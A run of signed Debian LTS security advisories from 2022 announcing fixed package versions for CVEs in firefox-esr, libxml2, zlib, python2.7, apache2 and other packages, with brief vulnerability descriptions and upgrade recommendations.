iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmMLOuQACgkQ0+Fzg8+n /wa5EhAAk2gRn9sJAlealaLCTNtatgM1VNAS6+qans3GFqUd++lzcD5DX1i2e6Tx lOR55eWNLeMqx3wP6w67Ik+uPvEfmPg6AKk/EiGkcgRfw8A5ZFdAXfg8yT7cC723 X/9qK7FepHR0cB297vzXezrWggV/Mjbsbfx3ZfMyUiS5S4iwSR5sqsNNXdLkudKC E3AymRsUKhOty6TSCRilNOd5kvORx9eJvUUTJca8Tfo6LwTQBCRWyTX6hU/5gQqP el5n2K+MZJ5eV0+ckrj8w8dCLT5y3M+/qgZGSosOMdqKSDZrNzDdvuUF8EKSjN6z 4H+ba5u4Fxr6oDCC4V4uCijsSTvbslH+XwGMCKGABxPL3Yq+ldC7H9mZIi5bJEGr gwu4iEeIAzIlTPdLvyycBqgLPV8S2Dzv7HV5Z1SXp6f38fUBczBTyq0kBSXkivOq tAH6eKGtqkiW1VXY1JSCl197GaxDrHQkBdFG3bDI+3hX0Kx9MN8qXBc0mShOkGep 788dVF38OL5BtOLVRwTLCsqGX2+mZX1hA1SgvZ8v3wg4Y3gZoIP/p0UYNsa3XFEV DZ3QamPS/YZlWhLfa05sTC+CaM5+W7SYkTaPT84wpyPd3//XaXYUuK+LUxBnkt7N t9PCZPXxSc+xlsECEWadAiXvTVDN7Q7iBkjuqps19PcQy4mMQjs= =ufUV -END PGP SIGNATURE-
[SECURITY] [DLA 3080-1] firefox-esr security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-3080-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky August 24, 2022 https://wiki.debian.org/LTS - - Package: firefox-esr Version: 91.13.0esr-1~deb10u1 CVE ID : CVE-2022-38472 CVE-2022-38473 CVE-2022-38478 Debian Bug : Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code or spoofing. For Debian 10 buster, these problems have been fixed in version 91.13.0esr-1~deb10u1. We recommend that you upgrade your firefox-esr packages. For the detailed security status of firefox-esr please refer to its security tracker page at: https://security-tracker.debian.org/tracker/firefox-esr Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmMGhb8ACgkQ0+Fzg8+n /wZ6OxAAj2NFWat//igxYPjh+JDm995lhVyFApVpf9pLwlA567AhpbD94ujY+Cmu ne+oQWumvjAHL6/tW7htrZdL42YCqr97Fh0X4qyH+gkmkLQkb1cHQL94aAlhW71I 7k6e4mqp1mRHZ1hxJSRIf1OC5vtCnuCILZu8EVv/ylT4uCMTvwo5oEUutBCCIISG EbhRpPZ6u6F5LnT4si10Bay48fAs3CwF39P9Tvq0fGXAKbzezQf/TRApNW1DtRjt Zz9tNsskKAqUb5oCN4kfkureDKks17buANxm9S9IWTLKvQ9maIdzc+gtRA/bnCZ8 0Tj1PZy4CWbK/3hYVfT3G/khSG9H+VKhaCR8s5XEzynJ/87gZ8TDR35b80sRANKy Jvgt6yK/lPGv9cecJnWTL1MukbGnkD5dK4u8py9JPF/2+JLn7O9fHVhfDLEsTu0b Wa8Tz6urQlpc1B+7HDxDAEvWv5p3xg50BBaK17CvYRFFqet2ZM8ylh4G0/UzqvGv bzu5WYiLO3QH3YEUy4HgsGkhvCLe9+jQxQRpZJIFg95egVqnXlYk6XW3bEvW1UIq 7rg39WuvJq4WFq1tnUeK6KmiV1l7UoCTbu1mzeLzIskhAc3MgSzWv5k4fGlfkqQ3 HIBD7UWBU5xgZ3EG4pv0fHL6msmMe3q5VblILDDqnGWei8SIw8I= =8s/D -END PGP SIGNATURE-
[SECURITY] [DLA 3019-1] admesh security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-3019-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky May 22, 2022 https://wiki.debian.org/LTS - - Package: admesh Version: 0.98.2-3+deb9u1 CVE ID : CVE-2018-25033 Debian Bug : 1010770 One security issue has been found in a tool for processing triangulated solid meshes admesh. A heap-based buffer over-read in stl_update_connects_remove_1 (called from stl_remove_degenerate) in connect.c was detected which might lead to memory corruption and other potential consequences. For Debian 9 stretch, this problem has been fixed in version 0.98.2-3+deb9u1. We recommend that you upgrade your admesh packages. For the detailed security status of admesh please refer to its security tracker page at: https://security-tracker.debian.org/tracker/admesh Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmKLAnQACgkQ0+Fzg8+n /wYpLw/+KtBi5ChsLMU1jLZjls+VLfnHQqHPignYNTSW7uFLnI/VDRo81PVYE19f LqzNbfo8xYsEBrUyiYpd9P0D5luaYBwxPrsQr7stfTlIUrVEVpgHFBPHYmXOA4Vj EI9K0wYLY7FVJyiC/Ry+qlSx2PMd48QdIt2ILD1EoTHKccUWUR0QJotvly5s1bvA 9B2Yxm32jGRmKpS78FZoT+FGI4XGEzOdufdCVGaMeTCeSpUd8EPla9vycQZ1tz9c M283aFNWYSDCZUutlfbfbnx9CmgvH/W59jzyOjdch03+kvN/qz48t1ApYpynSBtj 373R0D3SkRHzLo4i0NYKW5Mtnxw9sQYNvPSMQjdSlMjKE5Z7nL0sUckEqGJS+9nW J4vSCya37H9JFv68G3E6XR8hr0RAS+dg+65NshrYJgLRwNE0VcGLQP2ZVHZYubyE rUfk6V19DV/pjtUKSdazDOC5pUBp/XlsQ6FWuIYc4qyvPzYs0gj14zn1S5/D9V/i agh2o4qxqTHrRGMw3QYbArL7Z7XuxvGSKUnJW79OCHgtO+ikIA+l0tjbn9wJLAjb RJ/IGAIRHWewoxMTbAB5gHMEFPIaTVIKT71+j9k18yHveNxg6mtLI/vCEbjI1H7t 9+WVEL8T4J/3MCNaNCWWZFdbYJFt9TGb68KI1XciWM5ssmnPE3c= =2Q17 -END PGP SIGNATURE-
[SECURITY] [DLA 2983-1] abcm2ps security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 From: Anton Gladky To: debian-lts-announce@lists.debian.org Subject: [SECURITY] [DLA 2983-1] abcm2ps security update - - Debian LTS Advisory DLA-2983-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky April 16, 2022https://wiki.debian.org/LTS - - Package: abcm2ps Version: 7.8.9-1+deb9u1 CVE ID : CVE-2018-10753 CVE-2018-10771 CVE-2019-1010069 CVE-2021-32434 CVE-2021-32435 CVE-2021-32436: Multiple vulnerabilities have been discovered in abcm2ps: program which translates ABC music description files to PostScript. CVE-2018-10753 Stack-based buffer overflow in the delayed_output function in music.c allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact. CVE-2018-10771 Stack-based buffer overflow in the get_key function in parse.c allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact. CVE-2019-1010069 Incorrect access control allows attackers to cause a denial of service via a crafted file. CVE-2021-32434 Array overflow when wrong duration in voice overlay. CVE-2021-32435 Stack-based buffer overflow in the function get_key in parse.c allows remote attackers to cause a senial of service (DoS) via unspecified vectors. CVE-2021-32436 Out-of-bounds read in the function write_title() in subs.c allows remote attackers to cause a denial of service via unspecified vectors. For Debian 9 stretch, these problems have been fixed in version 7.8.9-1+deb9u1. We recommend that you upgrade your abcm2ps packages. For the detailed security status of abcm2ps please refer to its security tracker page at: https://security-tracker.debian.org/tracker/abcm2ps Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmJbpzsACgkQ0+Fzg8+n /wb3FhAAkxX+SysYeZnpdq+bMS8MOSftBP1iRKBGrJ7c8rv1vT9MK2ZsxVDScl8q tgt+UvraL5x46o9axFmDcWvQYe4Q82vZuRj2HqYqvqaJkjZYF/gPjqXiptLLPeZ+ IH3XAUhOofFt5iNqICINiy4lIHcyPyCMQItiXe0rR3k21MHnk6RIgAgi4dOWh/aD 6A53kzWIhXiTqkKX4m18Al+dpobhC870sTuvg8gW6QuwrETYBtfa7G1ZGsagR01p KPXO5pVBYhUhw7QRpxprKbUriCNv44mX4ZZRumyh863jtcS7ZJJlcXa+pehYOSPs aZw5iweKt5fu6S7KGvZa+1bHJXVEFyxuAu/kMzTsdTTDZk1FGA9zThPr17gzQ+b1 sEfrjKh7Ux3gsfFzhNKczAdvl8kIgkRV5FHbH9GD9FMihxFcgrE0j0yVC7BGK7rX 16Z/TYxgliC1aPRVx4WCYQfWwiiJvgDAkxjkHR5D8S8+/qZ+iAK26EEuR2Zk9k7O XmlCZNuQP0clVLRmg2PtA/ao5/dSgFlHtwK4S7OjBAIiMZgojnQr8WcBvGynl/St 8bEg9v9yDArRwC6uymqpq3II8jzL35CBx5OsPAKetC3bAQ87ImNyk+K3JwMaHFs4 Ls1bzO7vVQc92sALs8KpJqc9KxA4eihczQl/j5YEivJN91NsgvE= =JgCR -END PGP SIGNATURE-
[SECURITY] [DLA 2975-1] openjpeg2 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2975-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky April 10, 2022https://wiki.debian.org/LTS - - Package: openjpeg2 Version: 2.1.2-1.1+deb9u7 CVE ID : CVE-2020-27842 CVE-2020-27843 CVE-2021-29338 CVE-2022-1122 Multiple vulnerabilities have been discovered in openjpeg2, the open-source JPEG 2000 codec. CVE-2020-27842 Null pointer dereference through specially crafted input. The highest impact of this flaw is to application availability. CVE-2020-27843 The flaw allows an attacker to provide specially crafted input to the conversion or encoding functionality, causing an out-of-bounds read. The highest threat from this vulnerability is system availability. CVE-2021-29338 Integer overflow allows remote attackers to crash the application, causing a denial of service. This occurs when the attacker uses the command line option "-ImgDir" on a directory that contains 1048576 files. CVE-2022-1122 Input directory with a large number of files can lead to a segmentation fault and a denial of service due to a call of free() on an uninitialized pointer. For Debian 9 stretch, these problems have been fixed in version 2.1.2-1.1+deb9u7. We recommend that you upgrade your openjpeg2 packages. For the detailed security status of openjpeg2 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/openjpeg2 Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmJS014ACgkQ0+Fzg8+n /wYtGQ//RVxucO3D5d3vCI5R6tMps1pGCpB65CFwBoUsiNAH4rxpKkNwUusSjTXJ /DJZc4SWeQPjKkIBHF4N2Pfa5B+nj8nogc/P4DjYw1YYWqtviNzb7T5kFsUFdel/ QTIjXjgnIa494+9oBFt46ktblRQKXTJdyc/JngOzNkCdSQO4zVD1ADo8EDVDh4u1 t2VtbDQPYSiETmuLq75a6paiZHYfMe7bW/J3T9W6A0TX8sy78D7MID4okc8x3qoi EshovPF+XrXEUDxzRxXTibkuItqWT2okQoR4GaiY5Wu1oj/37cimIC9HHjdN6Rt3 uiImw0bAEwv7y6WdowXFqEgD/W6JSeAB+RWvZ7D4aQkJ2dlPqB1FRPr0eAmJMIBS 0QLym43SrIRKIg1RkpUoFrW9DkMuTlyfh+8N5PYF7IRtAKh4nN7SvXvpr2Ha/lSD 3zbJqtkk0AYOi28wZrkFkkIDurxZKDXEKMoytSb82turI6/npr5AQZUJnx1w9q6a bPqNmFCIPl4Ia1YVcxlTtNuVUf+Zqyoc8f4rv4xrlV4XmbVxQLQf6vPuBly4ZJxE nyNThfVKtwMD61kRZYNouZtQa2ySkQEH/W+OCmzfwWdC0zo0CuOQtO1O0PqJcjeh meTZVBjkZzdqAFctlVXKS86FFxHAA6lGZjpl7Dc7+4wMmpsLLDo= =/qyq -END PGP SIGNATURE-
[SECURITY] [DLA 2972-1] libxml2 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2972-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky April 08, 2022https://wiki.debian.org/LTS - - Package: libxml2 Version: 2.9.4+dfsg1-2.2+deb9u6 CVE ID : CVE-2016-9318 CVE-2017-5130 CVE-2017-5969 CVE-2017-16932 CVE-2022-23308 Five security issues have been discovered in libxml2: XML C parser and toolkit. CVE-2016-9318 Vulnerable versions do not offer a flag directly indicating that the current document may be read but other files may not be opened, which makes it easier for remote attackers to conduct XML External Entity (XXE) attacks via a crafted document. CVE-2017-5130 Integer overflow in memory debug code, allowed a remote attacker to potentially exploit heap corruption via a crafted XML file. CVE-2017-5969 Parser in a recover mode allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted XML document. CVE-2017-16932 When expanding a parameter entity in a DTD, infinite recursion could lead to an infinite loop or memory exhaustion. CVE-2022-23308 the application that validates XML using xmlTextReaderRead() with XML_PARSE_DTDATTR and XML_PARSE_DTDVALID enabled becomes vulnerable to this use-after-free bug. This issue can result in denial of service. For Debian 9 stretch, these problems have been fixed in version 2.9.4+dfsg1-2.2+deb9u6. We recommend that you upgrade your libxml2 packages. For the detailed security status of libxml2 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/libxml2 Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmJQpkoACgkQ0+Fzg8+n /wZ6PhAAndS9fS9kzIuxuaQ/SfAgvd2qzI63fcXHtMufm81bHPrXV3JIDVHlJvLD 9xAxT20ml3PzAiMBN8osKlCGmWqU2jF7tCsAQvfL+8GNNzNBHr/GY+OXKT/bn0sw 8knaLjmCS+hkndo8UFzmN+2nFgN6HmimKAdo9TinVc134jkwwKEkozcPZxfN22LI Bey+kGN3ML6NJLPkz9rcwDzNDcerAKSu1prMLlc6JPUji9Rj4RWwTJNV3tLlcBFJ JJcD7zROMebTjq7F+Zmlmtgo3eZvAV4WsPiC/VdraFShfx+J89EVlWTNvnr4xw9p v1Os5+JvLd2q538Tnw39vy6oxyfUayTANtBdaUn5AMf2kDY4K9cP4naQnLNhDlhF X0OSsNZxVN7w98NjYtVkmDwEkBZByPjBuglsKWG95atFWx1a3Yctdchi/Am6aZCn eF6yc+VnwMnkvYdChUxYIP7fj2fEvI2aoaZ+YTn7c+ZwBteijekOLK2At98kQmvj h/SaliPNbw6ITXtAAFrBLsBO07A7YS59WuHfIiKK3Lv0vlGiutfEshrT59a2BA38 JksMEkqLYKfq+RIGOnKz23KJL7u1u2Rc973zgClz5l+GXdqIW7lvcvMdzzuKzXZX Q6RUQlvLmLRA26fLu/ql30H2delrtDmAHuXjMb4evVec5ygL9U4= =s6iR -END PGP SIGNATURE-
[SECURITY] [DLA 2968-1] zlib security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2968-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky April 02, 2022https://wiki.debian.org/LTS - - Package: zlib Version: 1:1.2.8.dfsg-5+deb9u1 CVE ID : CVE-2018-25032 Debian Bug : 1008265 One security issue has been found in a compression library zlib. Danilo Ramos discovered that incorrect memory handling in zlib's deflate handling could result in denial of service or potentially the execution of arbitrary code if specially crafted input is processed. For Debian 9 stretch, this problem has been fixed in version 1:1.2.8.dfsg-5+deb9u1. We recommend that you upgrade your zlib packages. For the detailed security status of zlib please refer to its security tracker page at: https://security-tracker.debian.org/tracker/zlib Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmJIvRUACgkQ0+Fzg8+n /wa2sRAAnVRUX6BJ3XirC9hT+s8oTH199z72pURYtFjcpVkmORHqdpjQwNiwOTkE xSfezAO116Ts5YTi6UnKtZYKd6NwxhtcAWp5Q2wdbKAuI5Tcz8OI+cxfbWE9MNdN BqxOWvmgw3S937Qw3goXS78jIjei+1KauNk9clyLg/qrHempXagl8kT4eQq7JEDU l8uNAP+s4rV6FbrFIgeoNgKJ01MK5Os0iEY1mwgX3kI94XSsuBj4mEcxOh9kY5DL m1OiWokEZs9IOarFOaWw2BuOcN2FEkRRANvNeqzthDWDnqIwsfLl399V6Ow7TzrM Yqokqk3u91xst2ea+4E7/StlDpQI4y0PvtOVlfieSXaDbiPZTWLEQnnpAHAdtqIB g/RfTcnhNac38Tz1v1fyeQK/s+q0O1iRcPxPiTvbPpTvfO9UQ1vvhfvErxt4iTil go9RAXp8Rhtqp1/eACqybJ8xFjbAksLxWszCOZBoKzvsMc1xTRtrlImnTRZCyUd6 7pceOJzJV8QJkxPk5VOO9Rqp0XPQ/qtQsMP5EEtfvVkuyGaA2ALLppKBzF9O1CdU oR0LBhzg56Fgkx1m10uUqTJElF6flbJrMw0Z9MPT4IQo3/fGSOiYc/9rYi+B5aSS PIw6IfYsEdhMyVauICz2mJnTnA8EXCnT/fmG+GovzZRL1MzPmr4= =XmzY -END PGP SIGNATURE-
[SECURITY] [UPDATE] [DLA 2948-1] debian-archive-keyring update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2948-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky March 13, 2022https://wiki.debian.org/LTS - - Package: debian-archive-keyring Version: 2017.5+deb9u2 debian-archive-keyring is a package containing GnuPG archive keys of the Debian archive. New GPG-keys are being constantly added with every new Debian release. For Debian 9 stretch, GPG-keys for 11/bullseye Debian release are added in the version 2017.5+deb9u2. We recommend that you upgrade your debian-archive-keyring packages only if you need to work with packages from 11/bullseye release. Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmIuZCUACgkQ0+Fzg8+n /waPghAAkwzNN9hJtIvTnsMflkD43JE8QpNJwuFAaaOdOPADmGFAE6OH3+ZxuBHi 7QKSpEHx0wlfosHRxcqTYs34Gn16ZKscLD6ZExB2c71ZdsIJ15WQyOuqroL9Rajb pBhB1KddBKuyfTYYHMvyT9XZGSYgR3yKW5/9lUQv8ip83e1DmgN1y+osd0mu5DTB u8FUM87Qy5vYmmynWwnVxqRK1u0gzx3xXP4elbp90pAQQHBrhUWVhD0C5Gb6Udca NywnIgldI4/zx/WZAi6ROfDV5xpHV8ODCEPV1Bdm6ut3GZTg0ZUfthbQq9xLhqQZ n6KXcHAsNsmP2sEzxrkCVOqiSBaEUV2lKYs0sdGe3HTO3TTuo67/l6MnOTljsUgv G8NRmBxnjADagK5IJQ+b07yqgCc7B1RSqV9mjZST55N30Qzya4xdfzlc3h74ad9Z O8Akxo+4bjzdPyBxo4g5wyj2c0jbJ+3qJV5cJvPnyXGsO49q+8wlK96cNDiatSY4 gePNf7Z6qq6B9BmuTcksAZFTPtgyX6MyGJOXSBP9nZn0XBno59TVD3YcFbErvJqk 9blpEfmpttKLrAeDkaaNagBrXDNlM4eHTHuPfh9m3FHz5aUHu1ef78XbuYdM5mrq P48Sr8L52A4CM+DHXV7FBWQmop/53v8D0jCXfxAvTM4wG4SjhD4= =87Ag -END PGP SIGNATURE-
[SECURITY] [DLA 2937-1] gif2apng security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2937-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky March 07, 2022https://wiki.debian.org/LTS - - Package: gif2apng Version: 1.9+srconly-2+deb9u2 CVE ID : CVE-2021-45909 CVE-2021-45910 CVE-2021-45911 Three issues have been discovered in gif2apng: tool for converting animated GIF images to APNG format. CVE-2021-45909: heap-based buffer overflow vulnerability in the DecodeLZW function. It allows an attacker to write a large amount of arbitrary data outside the boundaries of a buffer. CVE-2021-45910: heap-based buffer overflow within the main function. It allows an attacker to write data outside of the allocated buffer. CVE-2021-45911: heap based buffer overflow in processing of delays in the main function. For Debian 9 stretch, these problems have been fixed in version 1.9+srconly-2+deb9u2. We recommend that you upgrade your gif2apng packages. For the detailed security status of gif2apng please refer to its security tracker page at: https://security-tracker.debian.org/tracker/gif2apng Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmImdoQACgkQ0+Fzg8+n /wbvAg/+LspuBOfueBg5GA8jDAA0PqCGXmapRCum8CCjAhkUUtJP3lzYRE4gvOWI KkmyuIdkMRo14yhMO+p9WAAJtZsgbGRAvZeNSOMR2bB1uGth2grOHMiHjr3sLeSI qIrChDhR/f+9aSKdGOmmke6D06Tk8eCihn8/ew+3bAMdHj/Y7vGBejNQeaebUg5Y Km+L04vM77snlpFsT3tMBqwBjP1cWYPM17TZlEdJ8W6pz1pxFa9aeIf6aiWA3xlZ BoCWipNgrUh5y7x3DG9RzsYgIgxHM745TndFjHwY6PJzUogqEOch+IN+9Pdun2/o REZHCyandnPXL/lPnAClPaMr+WktF2Qg34thDdaNdkjvjbhjjzJFWcMkCtaBpzVI vjkaLWAtKBTO70yiNNNZ6rc4zjDcDgCRyIOxYLleAR0blwWe67ALfq/4oLzAvESU IsFlni1wE1SS09WIXPCoXL4Td4fyJGmiLI3M+nzU7j3gEoTaSCf6Q0+LkZBQ5ccW 4SiDxbVFWh70NLZ638hO6WWY9Lp6oPaWS3jOaYF2sxPKlea9AiGqsuLw3W1Sg6Jl DOg54py33bayWD3iX1+V0nVVMkNZhBjvYcVBwZe6iBOObvj1w6FSBypLZEc0/uOa QJKQqHnC5VDEYs4u2oN3O5oYsxlkOH3Zvl9sLqFO9FBNfqVldSY= =za4R -END PGP SIGNATURE-
[SECURITY] [DLA 2929-1] ujson security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2929-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky February 26, 2022 https://wiki.debian.org/LTS - - Package: ujson Version: 1.35-1+deb9u1 CVE ID : CVE-2021-45958 One issue have been discovered in ujson: ultra fast JSON encoder and decoder for Python. CVE-2021-45958 Stack-based buffer overflow in Buffer_AppendIndentUnchecked (called from encode) has been detected. Exploitation can, for example, use a large amount of indentation. For Debian 9 stretch, this problem has been fixed in version 1.35-1+deb9u1. We recommend that you upgrade your ujson packages. For the detailed security status of ujson please refer to its security tracker page at: https://security-tracker.debian.org/tracker/ujson Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmIap3wACgkQ0+Fzg8+n /wasXg//bRnI92gxS/+jf275UkyR6Ivjhlsm2griSV+nCbBM4F2pal8j3O55S0gA KsKfqEbk8q+IrvWzoG6nRTTn2yNK+Ln5hQUb1tpWbNbh3gXFHybZ7M1bffJiZxIJ RkW8JrHWaTAIquhi7esKo/mgSJc9M9dxHGZj2HaeRBAo1LZwPgMQjoRmGsm017U3 ZwBmTPwwKal0fFwzploQ2op7dgKMZ1iq0dYJgrWyxD0xGuYcVKBPenP5FR/MpG6q bMDYtFKTRHgdFtZZ+ayzJlKvM6HN3bUgxKI3WiyfBKXqV5/X+qkEhPw3qEhd1HZi m9ElhZOUrGgTpE16IQd7Jn28KuiYGPaXCqDMZgC1D05DkVvCbEVBtlapXupL93Hz //WQ0ZfAzlimNlIb6M3cca3w1UDUWCHYBSQrzDc47p+O4y9ayqE5dDMMG630Lyef EHV6EpII2sXgqw1p6+qjaW9s8kRN7DSho142ZIkd/IMwhL4dpMui/XILUDA1Y3Dv UB9/xPvRnEPVmIinONvw0tJKjlbzuASfvM+4SmN9r5M26YDzdC/fwV3JFmExespE A5wEdyW4ePyc4c4IVAYqiF0bBa0QUoO2dj+zcPUPif8kiA10gX/j7k2SLjIE2moF wYyQ0Jv640ZXyySYBi7ObECOwaUnrxxiFCegyMf2sm1hwCQiKhM= =xfNX -END PGP SIGNATURE-
[SECURITY] [DLA 2919-1] python2.7 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2919-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky February 12, 2022 https://wiki.debian.org/LTS - - Package: python2.7 Version: 2.7.13-2+deb9u6 CVE ID : CVE-2021-3177 CVE-2021-4189 Two issues have been discovered in python2.7: CVE-2021-3177 Python has a buffer overflow in PyCArg_repr in _ctypes/callproc.c, which may lead to remote code execution in certain Python applications that accept floating-point numbers as untrusted input. CVE-2021-4189 A flaw was found in Python, specifically in the FTP (File Transfer Protocol) client library when using it in PASV (passive) mode. The flaw lies in how the FTP client trusts the host from PASV response by default. An attacker could use this flaw to setup a malicious FTP server that can trick FTP clients into connecting back to a given IP address and port. This could lead to FTP client scanning ports which otherwise would not have been possible. . Instead of using the returned address, ftplib now uses the IP address we're already connected to. For the rare user who wants an old behavior, set a `trust_server_pasv_ipv4_address` attribute on your `ftplib.FTP` instance to True. For Debian 9 stretch, these problems have been fixed in version 2.7.13-2+deb9u6. We recommend that you upgrade your python2.7 packages. For the detailed security status of python2.7 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/python2.7 Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmIIAncACgkQ0+Fzg8+n /wZuIw/+OiuwUuPTvw9K+5rw1h1Rme/llzRWopNoPh8wJ+mhz8VOJ9O0gkdRqphu zpA8JjP+6Nip0cBLQsDlfs/3Oz8H3mZdh7f3SwIlaFqR/U0Y7/SvyL31NwVc84i6 zsQPeXU3Z6Ox8EEUg5B3UCiaaeaOoTQayXCoGPx72i+wOiLSIwK7Aq7H04PBmfSJ hWL6p7O+B+KiwlGcgK9oX+cGa84SoZFrSsSY8ftY/ZDdtTlbGLZn6y1yPtsszsxf sMS0PMN9iOCqeSBqelSldLVV8eSFmdE1nvR3NMfX8jNHp8Q8DKkRhlzR6w6O6FFL 8gGWrg7IZL1D6nblYwGoGWcZDftcDl26cayLVTg9NsHmTGTH5PYPz6/43VRK5qz6 66naV0S38f0CgcfHhuiBG3D+u1VOAe8DSlmgCmf52Iqu+1xbE+PM3WyOhDwSI11Z EllRe4+s1tnojc7U3EOkpd/JbxFp7wWYtSCkpYmDfGXhFy1Er4oKGPAZURymFtBK IEiTE42RqqfC77kwxoqz++W0VEx/JDKOMHT0zcxtip1G9aYtCMM6nt5fsrxwxZNY CyL7QVEeVtn4qum2Z1BwDaUJZpdf0nDAgmoQWgXAt0LZ9zevVNG9wv0XgQacUnLG AGCjRWwl77dgeYrJMlItYLFRoFReEnh+YuRbbvgIcZwBr1tSrOk= =3cDu -END PGP SIGNATURE-
[SECURITY] [DLA 2907-1] apache2 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2907-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky February 01, 2022 https://wiki.debian.org/LTS - - Package: apache2 Version: 2.4.25-3+deb9u12 CVE ID : CVE-2021-44224 CVE-2021-44790 Two vulnerabilities have been discovered in the Apache HTTP server: CVE-2021-44224 When operating as a forward proxy, Apache was depending on the setup suspectable to denial of service or Server Side Request forgery. CVE-2021-44790 A buffer overflow in mod_lua may result in denial of service or potentially the execution of arbitrary code. For Debian 9 stretch, these problems have been fixed in version 2.4.25-3+deb9u12. We recommend that you upgrade your apache2 packages. For the detailed security status of apache2 please refer to its security tracker page at: https://security-tracker.debian.org/tracker/apache2 Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmH5o6AACgkQ0+Fzg8+n /waQSA//fTkCFFZZ/s0vp91MOaNIMjOh8TYgohRuYSlM6AN9Iq49L5mhFfrcXiD9 dG/oYNRHVw7cTgjIi2Uj3p+UCP/WmdfDPV4kyPAMSfeviJks0rlGE7qTvgFr11pL OcJBe6tR2P/MrLJhQkV5ThgBZjHgQ31todCw7dnoVg2rip8oeeEiY1JbPUvo5gYg 3zXTENYKMf7yxGNkQEfSLOC80fCsUAxR+szqdfx0li4h6+3aI7gkufVszn2YpalQ KEOJk7/0rvhdMIkZVaNVQERhyiiPVQ1meeX2aW6onhvmMp/JepkL30afVhcOSWbr QQYSsYfj/NpjOIYLc8NCRUFdB0cPlRtTETOJTDk2dkBNrESztGPA1procz5RscAR EuyPAqwDivd+SVhsXc0p6UPpEK24GB2mJTLQAdbw5I/4oREQNQIJ4Pttqtm/WurJ ecOVZ1/CxbBr2/tUh56DTmXWTWvH714aAlcgpU+sJROz2/VBLFagpg/pxIAu9mM1 SY6GQYqEtfK7wl8lbn0lrVMh9bco+iNlCZB1amXcsSKKYFeUeHcDPjPvtMZIzg/c l1hgE4D0t2LoEiCX7btPCWvmAyP3j+XMqsnKbH9NHL2fQcIZgq0B+nc2m4TThmI1 hY8BT2ltvJn+aFGNaD2lgpffzSQ7eZmR+mP4mqE2m/wQDKDIuTs= =BHJi -END PGP SIGNATURE-
